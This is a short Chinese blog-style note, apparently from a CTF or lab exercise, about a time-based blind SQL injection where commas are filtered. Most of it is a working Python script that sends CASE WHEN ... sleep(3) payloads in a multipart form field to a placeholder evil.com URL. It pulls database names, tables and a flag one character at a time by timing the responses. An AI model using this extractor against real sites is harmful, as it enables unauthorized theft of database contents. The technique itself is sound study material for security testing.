遇到一个盲注，记录一下

在基于时间的盲注的时候，一般使用的是if语句，如果符合条件就sleep，但是部分不能使用逗号的场景下，还可以使用case when #condition then ... else ... end语句来代替if语句，参考http://dev.mysql.com/doc/refman/5.7/en/control-flow-functions.html。

需要将数据切换multipart/form-data方式发送

# coding=utf-8
import time
import requests
from requests_toolbelt import MultipartEncoder

url = "https://evil.com/aaaaa/aaaa.htm"

def get_info(sql):
print (sql, )
for position in range(1, 30):
for ord in range(32, 127):
start_time = time.time()

xff= "G100000240' ||case when ord(substr({sql} from {position} for 1))={ord} then sleep(3) else '1111111' end ||' ".format(sql=sql, position=str(position), ord=ord)

#print(xff)
m = MultipartEncoder(fields={'cateCode': xff})
r = requests.post(url, data=m,
headers={'Content-Type': m.content_type})
end_time = time.time()
#print r.text.encode('utf-8')
if end_time - start_time > 2.9:
print (position, chr(ord))
break

end_time = time.time()
if end_time - start_time > 2.9:
print (position, chr(ord))
break
# print (position, c)
else:
return

#get_info("version()")
#get_info("user()")
#get_info("database()")
get_info("(select distinct TABLE_SCHEMA from information_schema.tables limit 1,2)")

#for i in range(2):
# get_info("(select table_name from information_schema.tables where table_schema='ip_db' limit 1 offset {offset})".format(offset=i))

#get_info("(select column_name from information_schema.columns where table_name='flag' and table_schema='ip_db' limit 1)")
#get_info("(select flag from ip_db.flag limit 1)")

参考链接：

https://strcpy.me/index.php/archives/736/